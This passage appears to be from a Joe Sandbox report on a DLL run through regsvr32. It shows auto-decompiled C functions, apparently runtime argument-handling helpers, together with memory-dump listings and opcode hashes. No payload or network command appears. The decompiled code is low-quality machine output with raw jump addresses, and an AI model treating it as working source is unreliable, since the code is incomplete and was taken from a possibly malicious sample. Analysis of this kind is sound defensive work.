                                                                      				void* _t74;
                                                                      				void* _t79;
                                                                      
                                                                      				_t78 = __r8;
                                                                      				_a8 = __rbx;
                                                                      				_t64 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80024a6c;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t67 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				r8d =  *(_t67 - 8) & 0x000000ff;
                                                                      				 *__rdx = __r8;
                                                                      				goto 0x80024b3b;
                                                                      				if (__eax - 0x63 <= 0) goto 0x80024aad;
                                                                      				_t57 =  *((intOrPtr*)(_t67 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t57 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t57 + 0x2c)) = 0x16;
                                                                      				_t58 =  *((intOrPtr*)(_t67 + 8));
                                                                      				_v16 = _t58;
                                                                      				_v24 = _t72;
                                                                      				E0000000118003AA20(_t58, __rcx, _t67, __rdx, _t73, _t74, __r8);
                                                                      				goto 0x80024b3d;
                                                                      				if ( *((intOrPtr*)(_t67 + 0x470)) != 1) goto 0x80024b2d;
                                                                      				_t44 =  *(_t67 + 0x34);
                                                                      				r9d =  *(_t64 + 0x3a) & 0x0000ffff;
                                                                      				_t71 = _t64 + (_t58 + _t58 * 2 + 0x90) * 8;
                                                                      				if ( *_t71 != 0) goto 0x80024ae9;
                                                                      				 *_t71 = 1;
                                                                      				_t71[1] = r9w;
                                                                      				_t71[4] = _t44;
                                                                      				dil = 1;
                                                                      				goto 0x80024b3d;
                                                                      				_v24 = _t44;
                                                                      				r8d = 1;
                                                                      				if (E00000001180010A8C(_t64, _t64, _t71, _t73, _t79) != 0) goto 0x80024ae1;
                                                                      				_t61 =  *((intOrPtr*)(_t64 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t61 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t61 + 0x2c)) = 0x16;
                                                                      				_t62 =  *((intOrPtr*)(_t64 + 8));
                                                                      				_v16 = _t62;
                                                                      				_v24 = _t72;
                                                                      				E0000000118003AA20(_t62, _t64, _t64, _t71, _t73, _t74, _t78);
                                                                      				goto 0x80024ae4;
                                                                      				 *_t71 = _t62;
                                                                      				return 1;
                                                                      			}

















                                                                      0x180024a40
                                                                      0x180024a40
                                                                      0x180024a51
                                                                      0x180024a54
                                                                      0x180024a56
                                                                      0x180024a5b
                                                                      0x180024a5f
                                                                      0x180024a64
                                                                      0x180024a67
                                                                      0x180024a76
                                                                      0x180024a78
                                                                      0x180024a7e
                                                                      0x180024a81
                                                                      0x180024a86
                                                                      0x180024a8a
                                                                      0x180024a91
                                                                      0x180024a97
                                                                      0x180024a9c
                                                                      0x180024aa1
                                                                      0x180024aa8
                                                                      0x180024ab8
                                                                      0x180024aba
                                                                      0x180024ac4
                                                                      0x180024ac9
                                                                      0x180024ad1
                                                                      0x180024ad3
                                                                      0x180024ad9
                                                                      0x180024ade
                                                                      0x180024ae1
                                                                      0x180024ae7
                                                                      0x180024ae9
                                                                      0x180024aed
                                                                      0x180024afd
                                                                      0x180024aff
                                                                      0x180024b03
                                                                      0x180024b06
                                                                      0x180024b0d
                                                                      0x180024b11
                                                                      0x180024b18
                                                                      0x180024b1c
                                                                      0x180024b21
                                                                      0x180024b26
                                                                      0x180024b2b
                                                                      0x180024b38
                                                                      0x180024b47

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e5175b3594264874c1733d4ecbe8e2630a14b4e8ea17cd0b9bcf2e7f8e098195
                                                                      • Instruction ID: 1d0a222590f5cb2c9933984d2ba1b73af148bcc6fe73e7efdb296ab22a99758c
                                                                      • Opcode Fuzzy Hash: e5175b3594264874c1733d4ecbe8e2630a14b4e8ea17cd0b9bcf2e7f8e098195
                                                                      • Instruction Fuzzy Hash: 7F31A473214A58C6EBA28F29E0403AD7BA4F38DB8CF258125EB8D4B751CF36C556DB04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 49%
                                                                      			E00000001180022AF0(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long __r8, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				signed int _v24;
                                                                      				signed int _t44;
                                                                      				intOrPtr _t57;
                                                                      				signed long long _t58;
                                                                      				intOrPtr _t61;
                                                                      				signed long long _t62;
                                                                      				void* _t64;
                                                                      				intOrPtr _t67;
                                                                      				signed int* _t71;
                                                                      				signed int _t72;
                                                                      				void* _t73;
                                                                      				void* _t74;
                                                                      				void* _t79;
                                                                      
                                                                      				_t78 = __r8;
                                                                      				_a8 = __rbx;
                                                                      				_t64 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80022b1c;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t67 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				r8d =  *(_t67 - 8) & 0x0000ffff;
                                                                      				 *__rdx = __r8;
                                                                      				goto 0x80022beb;
                                                                      				if (__eax - 0x63 <= 0) goto 0x80022b5d;
                                                                      				_t57 =  *((intOrPtr*)(_t67 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t57 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t57 + 0x2c)) = 0x16;
                                                                      				_t58 =  *((intOrPtr*)(_t67 + 8));
                                                                      				_v16 = _t58;
                                                                      				_v24 = _t72;
                                                                      				E0000000118003AA20(_t58, __rcx, _t67, __rdx, _t73, _t74, __r8);
                                                                      				goto 0x80022bed;
                                                                      				if ( *((intOrPtr*)(_t67 + 0x470)) != 1) goto 0x80022bdd;
                                                                      				_t44 =  *(_t67 + 0x34);
                                                                      				r9d =  *(_t64 + 0x3a) & 0x0000ffff;
                                                                      				_t71 = _t64 + (_t58 + _t58 * 2 + 0x90) * 8;
                                                                      				if ( *_t71 != 0) goto 0x80022b99;
                                                                      				 *_t71 = 1;
                                                                      				_t71[1] = r9w;
                                                                      				_t71[4] = _t44;
                                                                      				dil = 1;
                                                                      				goto 0x80022bed;
                                                                      				_v24 = _t44;
                                                                      				r8d = 1;
                                                                      				if (E00000001180017AF4(_t64, _t64, _t71, _t73, _t79) != 0) goto 0x80022b91;
                                                                      				_t61 =  *((intOrPtr*)(_t64 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t61 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t61 + 0x2c)) = 0x16;
                                                                      				_t62 =  *((intOrPtr*)(_t64 + 8));
                                                                      				_v16 = _t62;
                                                                      				_v24 = _t72;
                                                                      				E0000000118003AA20(_t62, _t64, _t64, _t71, _t73, _t74, _t78);
                                                                      				goto 0x80022b94;
                                                                      				 *_t71 = _t62;
                                                                      				return 1;
                                                                      			}

















                                                                      0x180022af0
                                                                      0x180022af0
                                                                      0x180022b01
                                                                      0x180022b04
                                                                      0x180022b06
                                                                      0x180022b0b
                                                                      0x180022b0f
                                                                      0x180022b14
                                                                      0x180022b17
                                                                      0x180022b26
                                                                      0x180022b28
                                                                      0x180022b2e
                                                                      0x180022b31
                                                                      0x180022b36
                                                                      0x180022b3a
                                                                      0x180022b41
                                                                      0x180022b47
                                                                      0x180022b4c
                                                                      0x180022b51
                                                                      0x180022b58
                                                                      0x180022b68
                                                                      0x180022b6a
                                                                      0x180022b74
                                                                      0x180022b79
                                                                      0x180022b81
                                                                      0x180022b83
                                                                      0x180022b89
                                                                      0x180022b8e
                                                                      0x180022b91
                                                                      0x180022b97
                                                                      0x180022b99
                                                                      0x180022b9d
                                                                      0x180022bad
                                                                      0x180022baf
                                                                      0x180022bb3
                                                                      0x180022bb6
                                                                      0x180022bbd
                                                                      0x180022bc1
                                                                      0x180022bc8
                                                                      0x180022bcc
                                                                      0x180022bd1
                                                                      0x180022bd6
                                                                      0x180022bdb
                                                                      0x180022be8
                                                                      0x180022bf7

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f2af8ad98c1301ebe9c45c1c3bc4bb47ff8d3a6c966baac8418eec5f49d1bacc
                                                                      • Instruction ID: c811a0fa78f1e10739abf08c4fa2f5656a46477ee7d88ce474c201aa08c4e1c7
                                                                      • Opcode Fuzzy Hash: f2af8ad98c1301ebe9c45c1c3bc4bb47ff8d3a6c966baac8418eec5f49d1bacc
                                                                      • Instruction Fuzzy Hash: 7131A473214A48C6EBA28F19E4403AD77A0F38DB8CF658115EB9C4B751DF36C5A6DB04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 52%
                                                                      			E0000000118001EB0C(void* __eax, long long __rbx, long long __rcx, intOrPtr* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				signed int _v24;
                                                                      				void* __rdi;
                                                                      				signed int _t43;
                                                                      				signed int _t45;
                                                                      				intOrPtr _t58;
                                                                      				signed long long _t59;
                                                                      				intOrPtr _t62;
                                                                      				signed long long _t63;
                                                                      				long long _t65;
                                                                      				intOrPtr _t68;
                                                                      				long long _t69;
                                                                      				signed int* _t72;
                                                                      				signed int _t73;
                                                                      				void* _t74;
                                                                      				void* _t75;
                                                                      				void* _t79;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t65 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x8001eb39;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t68 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				r8d =  *(_t68 - 8) & 0x0000ffff;
                                                                      				 *__rdx = r8w;
                                                                      				goto 0x8001ec06;
                                                                      				if (__eax - 0x63 <= 0) goto 0x8001eb7a;
                                                                      				_t58 =  *((intOrPtr*)(_t68 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t58 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t58 + 0x2c)) = 0x16;
                                                                      				_t59 =  *((intOrPtr*)(_t68 + 8));
                                                                      				_v16 = _t59;
                                                                      				_v24 = _t73;
                                                                      				E0000000118003AA20(_t59, __rcx, _t68, __rdx, _t74, _t75, _t79);
                                                                      				goto 0x8001ec08;
                                                                      				if ( *((intOrPtr*)(_t68 + 0x470)) != 1) goto 0x8001ebf8;
                                                                      				_t45 =  *(_t68 + 0x34);
                                                                      				r9b =  *(_t65 + 0x39);
                                                                      				_t72 = _t65 + (_t59 + _t59 * 2 + 0x90) * 8;
                                                                      				if ( *_t72 != 0) goto 0x8001ebb4;
                                                                      				 *_t72 = 1;
                                                                      				_t72[1] = r9b;
                                                                      				_t72[4] = _t45;
                                                                      				dil = 1;
                                                                      				goto 0x8001ec08;
                                                                      				_v24 = _t45;
                                                                      				r8d = 1;
                                                                      				_t69 = _t65;
                                                                      				if (E00000001180015A5C(_t43, _t65, _t69, _t72, _t73, _t80, _t81) != 0) goto 0x8001ebac;
                                                                      				_t62 =  *((intOrPtr*)(_t65 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t62 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t62 + 0x2c)) = 0x16;
                                                                      				_t63 =  *((intOrPtr*)(_t65 + 8));
                                                                      				_v16 = _t63;
                                                                      				_v24 = _t73;
                                                                      				E0000000118003AA20(_t63, _t65, _t69, _t72, _t74, _t75, _t79);
                                                                      				goto 0x8001ebaf;
                                                                      				 *_t72 =  *( *(_t69 + 0x488 + _t63 * 8)) & 0x0000ffff;
                                                                      				return 1;
                                                                      			}






















                                                                      0x18001eb0c
                                                                      0x18001eb1d
                                                                      0x18001eb20
                                                                      0x18001eb22
                                                                      0x18001eb27
                                                                      0x18001eb2b
                                                                      0x18001eb30
                                                                      0x18001eb34
                                                                      0x18001eb43
                                                                      0x18001eb45
                                                                      0x18001eb4b
                                                                      0x18001eb4e
                                                                      0x18001eb53
                                                                      0x18001eb57
                                                                      0x18001eb5e
                                                                      0x18001eb64
                                                                      0x18001eb69
                                                                      0x18001eb6e
                                                                      0x18001eb75
                                                                      0x18001eb85
                                                                      0x18001eb87
                                                                      0x18001eb91
                                                                      0x18001eb95
                                                                      0x18001eb9d
                                                                      0x18001eb9f
                                                                      0x18001eba5
                                                                      0x18001eba9
                                                                      0x18001ebac
                                                                      0x18001ebb2
                                                                      0x18001ebb4
                                                                      0x18001ebb8
                                                                      0x18001ebbe
                                                                      0x18001ebc8
                                                                      0x18001ebca
                                                                      0x18001ebce
                                                                      0x18001ebd1
                                                                      0x18001ebd8
                                                                      0x18001ebdc
                                                                      0x18001ebe3
                                                                      0x18001ebe7
                                                                      0x18001ebec
                                                                      0x18001ebf1
                                                                      0x18001ebf6
                                                                      0x18001ec03
                                                                      0x18001ec12

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5042acee9224f427379fb223bfa459917aef110aabf833f927082b4b144ee45f
                                                                      • Instruction ID: e8e4f3f7244230de956784cf2ae3cb49e9397db80c26d4dc0c6df2164c6151b1
                                                                      • Opcode Fuzzy Hash: 5042acee9224f427379fb223bfa459917aef110aabf833f927082b4b144ee45f
                                                                      • Instruction Fuzzy Hash: DD31B573218A94C6EB618F29D4803AD77A0F38DB8CF158116EB8D4B751DF36C596CB04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 49%
                                                                      			E00000001180024B48(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				long long _t43;
                                                                      				intOrPtr _t56;
                                                                      				signed long long _t57;
                                                                      				intOrPtr _t60;
                                                                      				signed long long _t61;
                                                                      				long long _t64;
                                                                      				intOrPtr _t67;
                                                                      				intOrPtr* _t68;
                                                                      				long long* _t71;
                                                                      				long long _t72;
                                                                      				void* _t73;
                                                                      				void* _t74;
                                                                      				void* _t79;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t64 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80024b74;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t67 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((short*)(_t67 - 8));
                                                                      				goto 0x80024c44;
                                                                      				if (__eax - 0x63 <= 0) goto 0x80024bb5;
                                                                      				_t56 =  *((intOrPtr*)(_t67 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t56 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t56 + 0x2c)) = 0x16;
                                                                      				_t57 =  *((intOrPtr*)(_t67 + 8));
                                                                      				_v16 = _t57;
                                                                      				_v24 = _t72;
                                                                      				E0000000118003AA20(_t57, __rcx, _t67, __rdx, _t73, _t74,  *((short*)(_t67 - 8)));
                                                                      				goto 0x80024c46;
                                                                      				if ( *((intOrPtr*)(_t67 + 0x470)) != 1) goto 0x80024c35;
                                                                      				_t43 =  *((intOrPtr*)(_t67 + 0x34));
                                                                      				r9d =  *(_t64 + 0x3a) & 0x0000ffff;
                                                                      				_t71 = _t64 + (_t57 + _t57 * 2 + 0x90) * 8;
                                                                      				if ( *_t71 != 0) goto 0x80024bf1;
                                                                      				 *_t71 = 1;
                                                                      				 *((intOrPtr*)(_t71 + 4)) = r9w;
                                                                      				 *((intOrPtr*)(_t71 + 0x10)) = _t43;
                                                                      				dil = 1;
                                                                      				goto 0x80024c46;
                                                                      				_v24 = _t43;
                                                                      				r8d = 1;
                                                                      				_t68 = _t64;
                                                                      				if (E00000001180010A8C(_t64, _t68, _t71, _t73, _t79) != 0) goto 0x80024be9;
                                                                      				_t60 =  *((intOrPtr*)(_t64 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t60 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t60 + 0x2c)) = 0x16;
                                                                      				_t61 =  *((intOrPtr*)(_t64 + 8));
                                                                      				_v16 = _t61;
                                                                      				_v24 = _t72;
                                                                      				E0000000118003AA20(_t61, _t64, _t68, _t71, _t73, _t74,  *((short*)(_t67 - 8)));
                                                                      				goto 0x80024bec;
                                                                      				 *_t71 =  *((short*)( *((intOrPtr*)(_t68 + 0x488 + _t61 * 8))));
                                                                      				return 1;
                                                                      			}


















                                                                      0x180024b48
                                                                      0x180024b59
                                                                      0x180024b5c
                                                                      0x180024b5e
                                                                      0x180024b63
                                                                      0x180024b6c
                                                                      0x180024b6f
                                                                      0x180024b7e
                                                                      0x180024b80
                                                                      0x180024b86
                                                                      0x180024b89
                                                                      0x180024b8e
                                                                      0x180024b92
                                                                      0x180024b99
                                                                      0x180024b9f
                                                                      0x180024ba4
                                                                      0x180024ba9
                                                                      0x180024bb0
                                                                      0x180024bc0
                                                                      0x180024bc2
                                                                      0x180024bcc
                                                                      0x180024bd1
                                                                      0x180024bd9
                                                                      0x180024bdb
                                                                      0x180024be1
                                                                      0x180024be6
                                                                      0x180024be9
                                                                      0x180024bef
                                                                      0x180024bf1
                                                                      0x180024bf5
                                                                      0x180024bfb
                                                                      0x180024c05
                                                                      0x180024c07
                                                                      0x180024c0b
                                                                      0x180024c0e
                                                                      0x180024c15
                                                                      0x180024c19
                                                                      0x180024c20
                                                                      0x180024c24
                                                                      0x180024c29
                                                                      0x180024c2e
                                                                      0x180024c33
                                                                      0x180024c41
                                                                      0x180024c50

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3bd6936c4cedb9bebc595eac953f31225e415109cae37dbe40899e651ae10d30
                                                                      • Instruction ID: 5a0286e095fcbc3fbfe2c5f54f086b107a3c9afb3bc6992c6f18c69e6b8331ee
                                                                      • Opcode Fuzzy Hash: 3bd6936c4cedb9bebc595eac953f31225e415109cae37dbe40899e651ae10d30
                                                                      • Instruction Fuzzy Hash: 89318173205A48C6EBA68F19D5403AD77A0F398B8CF658115EB4C0B751DF36C596C704
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 49%
                                                                      			E00000001180022BF8(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				long long _t43;
                                                                      				intOrPtr _t56;
                                                                      				signed long long _t57;
                                                                      				intOrPtr _t60;
                                                                      				signed long long _t61;
                                                                      				long long _t64;
                                                                      				intOrPtr _t67;
                                                                      				intOrPtr* _t68;
                                                                      				long long* _t71;
                                                                      				long long _t72;
                                                                      				void* _t73;
                                                                      				void* _t74;
                                                                      				void* _t79;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t64 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80022c23;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t67 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((intOrPtr*)(_t67 - 8));
                                                                      				goto 0x80022cf2;
                                                                      				if (__eax - 0x63 <= 0) goto 0x80022c64;
                                                                      				_t56 =  *((intOrPtr*)(_t67 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t56 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t56 + 0x2c)) = 0x16;
                                                                      				_t57 =  *((intOrPtr*)(_t67 + 8));
                                                                      				_v16 = _t57;
                                                                      				_v24 = _t72;
                                                                      				E0000000118003AA20(_t57, __rcx, _t67, __rdx, _t73, _t74,  *((intOrPtr*)(_t67 - 8)));
                                                                      				goto 0x80022cf4;
                                                                      				if ( *((intOrPtr*)(_t67 + 0x470)) != 1) goto 0x80022ce4;
                                                                      				_t43 =  *((intOrPtr*)(_t67 + 0x34));
                                                                      				r9d =  *(_t64 + 0x3a) & 0x0000ffff;
                                                                      				_t71 = _t64 + (_t57 + _t57 * 2 + 0x90) * 8;
                                                                      				if ( *_t71 != 0) goto 0x80022ca0;
                                                                      				 *_t71 = 1;
                                                                      				 *((intOrPtr*)(_t71 + 4)) = r9w;
                                                                      				 *((intOrPtr*)(_t71 + 0x10)) = _t43;
                                                                      				dil = 1;
                                                                      				goto 0x80022cf4;
                                                                      				_v24 = _t43;
                                                                      				r8d = 1;
                                                                      				_t68 = _t64;
                                                                      				if (E00000001180017AF4(_t64, _t68, _t71, _t73, _t79) != 0) goto 0x80022c98;
                                                                      				_t60 =  *((intOrPtr*)(_t64 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t60 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t60 + 0x2c)) = 0x16;
                                                                      				_t61 =  *((intOrPtr*)(_t64 + 8));
                                                                      				_v16 = _t61;
                                                                      				_v24 = _t72;
                                                                      				E0000000118003AA20(_t61, _t64, _t68, _t71, _t73, _t74,  *((intOrPtr*)(_t67 - 8)));
                                                                      				goto 0x80022c9b;
                                                                      				 *_t71 =  *((intOrPtr*)( *((intOrPtr*)(_t68 + 0x488 + _t61 * 8))));
                                                                      				return 1;
                                                                      			}


















                                                                      0x180022bf8
                                                                      0x180022c09
                                                                      0x180022c0c
                                                                      0x180022c0e
                                                                      0x180022c13
                                                                      0x180022c1b
                                                                      0x180022c1e
                                                                      0x180022c2d
                                                                      0x180022c2f
                                                                      0x180022c35
                                                                      0x180022c38
                                                                      0x180022c3d
                                                                      0x180022c41
                                                                      0x180022c48
                                                                      0x180022c4e
                                                                      0x180022c53
                                                                      0x180022c58
                                                                      0x180022c5f
                                                                      0x180022c6f
                                                                      0x180022c71
                                                                      0x180022c7b
                                                                      0x180022c80
                                                                      0x180022c88
                                                                      0x180022c8a
                                                                      0x180022c90
                                                                      0x180022c95
                                                                      0x180022c98
                                                                      0x180022c9e
                                                                      0x180022ca0
                                                                      0x180022ca4
                                                                      0x180022caa
                                                                      0x180022cb4
                                                                      0x180022cb6
                                                                      0x180022cba
                                                                      0x180022cbd
                                                                      0x180022cc4
                                                                      0x180022cc8
                                                                      0x180022ccf
                                                                      0x180022cd3
                                                                      0x180022cd8
                                                                      0x180022cdd
                                                                      0x180022ce2
                                                                      0x180022cef
                                                                      0x180022cfe

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dca01370c94c6cdb0a424746daf8643f2fdf7691b68a4d2f3e6174545a122e38
                                                                      • Instruction ID: af94fc3259872d35dcdb37ae6deb6187e3da79f3f83e09a34b377663969925b1
                                                                      • Opcode Fuzzy Hash: dca01370c94c6cdb0a424746daf8643f2fdf7691b68a4d2f3e6174545a122e38
                                                                      • Instruction Fuzzy Hash: E331A272204B88C6EB668F29D0803AD77A0F38CB8CF658126EB5D0B751CF36C596D704
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 52%
                                                                      			E0000000118001EC14(void* __eax, long long __rbx, long long __rcx, intOrPtr* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				void* __rdi;
                                                                      				signed int _t43;
                                                                      				long long _t45;
                                                                      				intOrPtr _t58;
                                                                      				signed long long _t59;
                                                                      				intOrPtr _t62;
                                                                      				signed long long _t63;
                                                                      				long long _t65;
                                                                      				intOrPtr _t68;
                                                                      				long long _t69;
                                                                      				char* _t72;
                                                                      				long long _t73;
                                                                      				void* _t74;
                                                                      				void* _t75;
                                                                      				void* _t79;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t65 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x8001ec3f;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t68 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				r8b =  *((intOrPtr*)(_t68 - 8));
                                                                      				 *__rdx = r8b;
                                                                      				goto 0x8001ed0a;
                                                                      				if (__eax - 0x63 <= 0) goto 0x8001ec80;
                                                                      				_t58 =  *((intOrPtr*)(_t68 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t58 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t58 + 0x2c)) = 0x16;
                                                                      				_t59 =  *((intOrPtr*)(_t68 + 8));
                                                                      				_v16 = _t59;
                                                                      				_v24 = _t73;
